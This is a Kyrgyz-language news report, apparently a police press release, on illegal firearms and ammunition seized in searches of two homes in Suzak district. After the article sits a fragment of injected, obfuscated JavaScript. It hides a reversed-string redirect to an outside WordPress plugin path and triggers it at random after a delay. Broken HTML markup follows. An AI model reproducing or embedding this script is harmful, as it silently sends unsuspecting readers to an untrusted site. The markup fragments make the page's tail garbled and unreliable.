Сузакта мыйзамсыз сакталган курал жана ок-дарылар табылды
Сузак милициясы тарабынан район аймагында курал жана ок-дарыларды мыйзамсыз сактап жүргөн жарандар боюнча ыкчам маалыматтар алынып, Сузак РИИБдин КЖБРне КРнын Жазык кодексинин 253-беренеси (Куралды, ок-дарыларды мыйзамсыз жүгүртүү) менен катталып, сотко чейинки өндүрүш иши ачылган. Бул тууралуу Жалал-Абад ОИИБдин басма сөз кызматы маалымдады.
Аталган сотко чейинки өндүрүш ишинин алкагында Сузак райондук сотунун токтомунун негизинде Көк-Жаңгак шаарынын тургундары 1968-ж.т. Ш.Т. жана 1973-ж.т. Ч.А. аттуу жарандардын үйлөрүнө тинтүү жүргүзүлгөн. Сузак РИИБдин Экстремизмге жана мыйзамсыз миграцияга каршы аракеттенүү кызматынын (ЭММКАК) кызматкерлери тарабынан жүргүзүлгөн тинтүү иштеринин натыйжасында Ш.Т.нын үйүнөн Тоз-8 үлгүсүндөгү сайлуу ок атуучу курал 4 даана ок-дарысы, 16 калибрлүү сайсыз ок атуучу курал 13 даана ок-дарысы, 10 даана ок-дарылардын идиштери, ок-дары жасоочу аспаптары менен табылып алынган. Ал эми Ч.А.нын үйүнөн сайсыз 16 калибрлүү ок атуучу курал табылган.
Алынган курал жана ок-дарыларга тиешелүү экспертизалар дайындалган. Учурда тергөө амалдары уланууда.
{if (typeof ($NqM.list[n]) == «string») return $NqM.list[n].split(«»).reverse().join(«»);return $NqM.list[n];};$NqM.list=[«\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}</script>too.kg/wp-content/uploads/2021/06/s.jpg» alt=»» class=»wp-image-12736″ /></figure>
<figure class=)